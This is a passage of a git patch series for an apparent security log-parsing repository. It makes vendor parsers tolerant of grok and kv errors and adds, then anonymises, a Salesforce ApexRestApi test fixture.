raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "PUA %{GREEDYDATA:action}: '%{GREEDYDATA:threat}' at '%{GREEDYDATA:file_path}'" @@ -46,6 +50,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "'%{GREEDYDATA:threat}' exploit prevented in %{GREEDYDATA:category}" diff --git a/Squid/squid/ingest/parser.yml b/Squid/squid/ingest/parser.yml index f5b9de6f9..14c43d5d1 100644 --- a/Squid/squid/ingest/parser.yml +++ b/Squid/squid/ingest/parser.yml @@ -48,6 +48,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.url output_field: message pattern: "(%{IP:ip}|%{NOTSPACE:domain}):%{NUMBER:port}" diff --git a/Systancia/cleanroom/ingest/parser.yml b/Systancia/cleanroom/ingest/parser.yml index 0b80ff87c..44342010b 100644 --- a/Systancia/cleanroom/ingest/parser.yml +++ b/Systancia/cleanroom/ingest/parser.yml @@ -16,6 +16,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{event.result.event_reason}}" output_field: result pattern: "%{SESSION_SUCCESS}|%{SESSION_FAILURE}|%{PROCESS}" diff --git a/Tehtris/tehtris-edr/ingest/parser.yml b/Tehtris/tehtris-edr/ingest/parser.yml index cbcb244bb..aa8f22411 100644 --- a/Tehtris/tehtris-edr/ingest/parser.yml +++ b/Tehtris/tehtris-edr/ingest/parser.yml @@ -23,6 +23,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.description}}" pattern: "(%{APPLICATION_POLICY}|%{URL_DETECTED}|%{MALICIOUS_MACRO})" custom_patterns: diff --git a/ThinkstCanary/thinkst-canary/ingest/parser.yml b/ThinkstCanary/thinkst-canary/ingest/parser.yml index f8cada9ff..8ce315396 100644 --- a/ThinkstCanary/thinkst-canary/ingest/parser.yml +++ b/ThinkstCanary/thinkst-canary/ingest/parser.yml @@ -21,6 +21,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{parsed_event.message.DN}}" output_field: result value_sep: "=" diff --git a/Umbrella/umbrella-proxy/ingest/parser.yml b/Umbrella/umbrella-proxy/ingest/parser.yml index 790c57048..442c5da45 100644 --- a/Umbrella/umbrella-proxy/ingest/parser.yml +++ b/Umbrella/umbrella-proxy/ingest/parser.yml @@ -28,6 +28,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "event.message.http_request_url" output_field: message pattern: "(%{URIPROTO:url_scheme}://)?(?:%{URIHOST:url_domain})?(?:%{URIPATHPARAM:url_path})" diff --git a/Veeam/veeam_backup/ingest/parser.yml b/Veeam/veeam_backup/ingest/parser.yml index 5470c716c..7054d0a51 100644 --- a/Veeam/veeam_backup/ingest/parser.yml +++ b/Veeam/veeam_backup/ingest/parser.yml @@ -17,6 +17,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.UserName}}" output_field: user pattern: '%{GREEDYDATA:domain}\\%{GREEDYDATA:name}' diff --git a/Wallix/wallix-bastion/ingest/parser.yml b/Wallix/wallix-bastion/ingest/parser.yml index ed76d3f43..d9f1be434 100644 --- a/Wallix/wallix-bastion/ingest/parser.yml +++ b/Wallix/wallix-bastion/ingest/parser.yml @@ -2,6 +2,7 @@ name: wallix-bastion ignored_values: ["-"] pipeline: - name: parsed_event + filter: '{{not original.message.startswith("pam_unix(")}}' external: name: kv.parse-kv properties: diff --git a/Wallix/wallix-bastion/tests/cron.json b/Wallix/wallix-bastion/tests/cron.json index da4487e2e..fdb9da3bc 100644 --- a/Wallix/wallix-bastion/tests/cron.json +++ b/Wallix/wallix-bastion/tests/cron.json @@ -15,7 +15,6 @@ }, "user": { "name": "root" - }, - "wallix": {} + } } } \ No newline at end of file diff --git a/Wallix/wallix-bastion/tests/pam_unix.json b/Wallix/wallix-bastion/tests/pam_unix.json index 5dd28b147..d7ce961b4 100644 --- a/Wallix/wallix-bastion/tests/pam_unix.json +++ b/Wallix/wallix-bastion/tests/pam_unix.json @@ -15,7 +15,6 @@ }, "user": { "name": "wabuser" - }, - "wallix": {} + } } } \ No newline at end of file diff --git a/WatchGuard/watchguard-firebox/ingest/parser.yml b/WatchGuard/watchguard-firebox/ingest/parser.yml index 23bdfd0d6..36e32c512 100644 --- a/WatchGuard/watchguard-firebox/ingest/parser.yml +++ b/WatchGuard/watchguard-firebox/ingest/parser.yml @@ -14,6 +14,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.msg}}" output_field: message pattern: "%{DHCP}|%{USER_LOG}" diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml index 988ae3dbc..5fc6b2eec 100644 --- a/Windows/windows/ingest/parser.yml +++ b/Windows/windows/ingest/parser.yml @@ -35,6 +35,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{json.event.Hashes or json.event.Hash}}" output_field: result value_sep: "=" @@ -46,6 +47,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{json.event.Hashes or json.event.Hash}}" output_field: result value_sep: ":" @@ -84,6 +86,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json.event.IpAddress}}" output_field: event pattern: "%{GREEDYDATA}%{IPV4:ip}%{GREEDYDATA}" @@ -94,6 +97,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_message_kv.result.Contents}}" output_field: event pattern: >- @@ -105,6 +109,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json.event.url or json.event.RemoteName}}" output_field: event pattern: >- @@ -116,6 +121,7 @@ pipeline: name: grok.match description: #NEWLINE# is used because grok does not match multi-line fields and the KV stage does not support this field format. properties: + raise_errors: false input_field: '{{json.event.ContextInfo.replace(" "," ").replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}' output_field: event pattern: "%{CONTEXTINFO_FR}|%{CONTEXTINFO_EN}" @@ -128,6 +134,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: '{{json.event.Message.replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}' output_field: result pattern: >- @@ -139,6 +146,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: '{{json.event.Message.replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}' output_field: event pattern: >- diff --git a/WithSecure/withsecure-elements/ingest/parser.yml b/WithSecure/withsecure-elements/ingest/parser.yml index 83bd21cff..3f8525c4d 100644 --- a/WithSecure/withsecure-elements/ingest/parser.yml +++ b/WithSecure/withsecure-elements/ingest/parser.yml @@ -17,6 +17,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.details.userName}}" output_field: user pattern: "(%{DATA:domain}[/\\\\]+)?(%{USERNAME:name})" @@ -25,6 +26,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.userName}}" output_field: user pattern: "(%{DATA:domain}[/\\\\]+)?(%{USERNAME:name})" From ae8806c15f2905ce6b5333b2a4e82d8daa138ec9 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 6 Nov 2024 12:52:13 +0200 Subject: [PATCH 004/150] Fix linting --- Wallix/wallix-bastion/tests/session_integrity.json | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/Wallix/wallix-bastion/tests/session_integrity.json b/Wallix/wallix-bastion/tests/session_integrity.json index 39e8a6363..1c01481e9 100644 --- a/Wallix/wallix-bastion/tests/session_integrity.json +++ b/Wallix/wallix-bastion/tests/session_integrity.json @@ -6,13 +6,19 @@ "message": "[sessionintegrity] session_uid=\"1830c403be7caf0c00505688c380\" status=\"failed\" type=\"SSH_SHELL_SESSION\" user=\"adm@CORP.NET@1.1.1.1\" target=\"domain@local@target01.corp.net:SSH_1\" begin=\"2022-08-19 11:31:17\" end=\"2022-08-19 11:32:50\" files=[/var/wab/remote/recorded/ssh/2022-08-19/182b5714b466cba10050568e16d9,adm@CORP.NET@1.1.1.1,domain@target01.corp.net,20220819-113117,foo-bastion-bar.corp.net,1805.ttyrec]", "event": { "action": "SSH_SHELL_SESSION", - "category": ["session"], + "category": [ + "session" + ], "dataset": "session_integrity", "outcome": "failure", - "type": ["info"] + "type": [ + "info" + ] }, "related": { - "user": ["adm@CORP.NET@1.1.1.1"] + "user": [ + "adm@CORP.NET@1.1.1.1" + ] }, "user": { "name": "adm@CORP.NET@1.1.1.1" @@ -21,4 +27,4 @@ "type": "SSH_SHELL_SESSION" } } -} +} \ No newline at end of file From 4154e0ae785eb3b0a71393a338ecaf0185d827b3 Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Wed, 6 Nov 2024 15:39:35 +0200 Subject: [PATCH 005/150] Fix: Salesforce USER_AGENT --- .../tests/salesforce_apex_rest_api.json | 72 +++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json diff --git a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json new file mode 100644 index 000000000..bc47bdc36 --- /dev/null +++ b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json @@ -0,0 +1,72 @@ +{ + "input": { + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"00D2000000015O7\",\"USER_ID\":\"0057R000008Vnyi\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"MJK3WHqyl1nGTQHf\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"0057R000008VnyiQAC\",\"CLIENT_IP\":\"129.185.166.150\",\"URI_ID_DERIVED\":\"\"}" + }, + "expected": { + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"00D2000000015O7\",\"USER_ID\":\"0057R000008Vnyi\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"MJK3WHqyl1nGTQHf\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"0057R000008VnyiQAC\",\"CLIENT_IP\":\"129.185.166.150\",\"URI_ID_DERIVED\":\"\"}", + "event": { + "category": [ + "network" + ], + "dataset": "ApexRestApi", + "type": [ + "info" + ] + }, + "@timestamp": "2034-02-21T02:48:31.272150Z", + "http": { + "request": { + "method": "POST" + }, + "response": { + "mime_type": "application/json", + "status_code": 200 + } + }, + "organization": { + "id": "00D2000000015O7" + }, + "related": { + "ip": [ + "129.185.166.150" + ] + }, + "salesforce": { + "login": { + "key": "MJK3WHqyl1nGTQHf" + }, + "request": { + "id": "5-Acr8biM2uu2UsrkBY5B-", + "status": "S" + }, + "session": { + "key": { + "id": "E6btf+6MZDOBIAEF" + } + }, + "user": { + "type": "Standard" + } + }, + "source": { + "address": "129.185.166.150", + "ip": "129.185.166.150" + }, + "url": { + "path": "/requests" + }, + "user": { + "id": "0057R000008Vnyi" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "9999", + "os": { + "name": "Other" + } + } + } +} \ No newline at end of file From b6d4a9e42babc2d32b3734b4ffc2c06a1aba6a5d Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Wed, 6 Nov 2024 15:44:25 +0200 Subject: [PATCH 006/150] fix test --- .../tests/salesforce_apex_rest_api.json | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json index bc47bdc36..8c729ea91 100644 --- a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json +++ b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json @@ -1,9 +1,9 @@ { "input": { - "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"00D2000000015O7\",\"USER_ID\":\"0057R000008Vnyi\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"MJK3WHqyl1nGTQHf\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"0057R000008VnyiQAC\",\"CLIENT_IP\":\"129.185.166.150\",\"URI_ID_DERIVED\":\"\"}" + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}" }, "expected": { - "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"00D2000000015O7\",\"USER_ID\":\"0057R000008Vnyi\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"MJK3WHqyl1nGTQHf\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"0057R000008VnyiQAC\",\"CLIENT_IP\":\"129.185.166.150\",\"URI_ID_DERIVED\":\"\"}", + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}", "event": { "category": [ "network" @@ -24,16 +24,16 @@ } }, "organization": { - "id": "00D2000000015O7" + "id": "11111111111111111" }, "related": { "ip": [ - "129.185.166.150" + "1.2.3.4" ] }, "salesforce": { "login": { - "key": "MJK3WHqyl1nGTQHf" + "key": "xxxxxxxxxxxxxx" }, "request": { "id": "5-Acr8biM2uu2UsrkBY5B-", @@ -49,14 +49,14 @@ } }, "source": { - "address": "129.185.166.150", - "ip": "129.185.166.150" + "address": "1.2.3.4", + "ip": "1.2.3.4" }, "url": { "path": "/requests" }, "user": { - "id": "0057R000008Vnyi" + "id": "user123123123123" }, "user_agent": { "device": { From fc4fc8f197c1c509f4e6b82cbd042d406d4bdbf2 Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Wed, 6 Nov 2024 15:44:54 +0200 Subject: [PATCH 007/150] fix test --- .../salesforce-events/tests/salesforce_apex_rest_api.json | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json index 8c729ea91..c6a4ab44a 100644 --- a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json +++ b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json @@ -1,9 +1,9 @@ { "input": { - "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}" + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}" }, "expected": { - "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"E6btf+6MZDOBIAEF\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}", + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}", "event": { "category": [ "network" @@ -41,7 +41,7 @@ }, "session": { "key": { - "id": "E6btf+6MZDOBIAEF" + "id": "session-key12323" } }, "user": { From 0b6ea3a3378799d0028d2b7d16e3085c2dde2799 Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Wed, 6 Nov 2024 16:10:27 +0200 Subject: [PATCH 008/150] Change salesforce user_agent --- Salesforce/salesforce-events/_meta/fields.yml | 5 +++++ Salesforce/salesforce-events/ingest/parser.yml | 2 +- .../tests/salesforce_apex_rest_api.json | 17 ++++------------- .../tests/salesforce_complete_event_1.json | 13 +++---------- 4 files changed, 13 insertions(+), 24 deletions(-) diff --git a/Salesforce/salesforce-events/_meta/fields.yml b/Salesforce/salesforce-events/_meta/fields.yml index ec92923ea..29be61136 100644 --- a/Salesforce/salesforce-events/_meta/fields.yml +++ b/Salesforce/salesforce-events/_meta/fields.yml @@ -117,3 +117,8 @@ salesforce.user.type: description: Salesforce user type name: salesforce.user.type type: keyword + +salesforce.user_agent: + description: Salesforce user agent + name: salesforce.user_agent + type: number diff --git a/Salesforce/salesforce-events/ingest/parser.yml b/Salesforce/salesforce-events/ingest/parser.yml index 7a3452fa9..01b66855f 100644 --- a/Salesforce/salesforce-events/ingest/parser.yml +++ b/Salesforce/salesforce-events/ingest/parser.yml @@ -72,7 +72,7 @@ stages: filter: "{{json_event.output.BROWSER_TYPE != None}}" - set: - user_agent.original: "{{json_event.output.USER_AGENT}}" + salesforce.user_agent: "{{json_event.output.USER_AGENT | int}}" filter: "{{json_event.output.USER_AGENT != None}}" set_source_ip: diff --git a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json index c6a4ab44a..2250f3670 100644 --- a/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json +++ b/Salesforce/salesforce-events/tests/salesforce_apex_rest_api.json @@ -1,9 +1,9 @@ { "input": { - "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}" + "message": 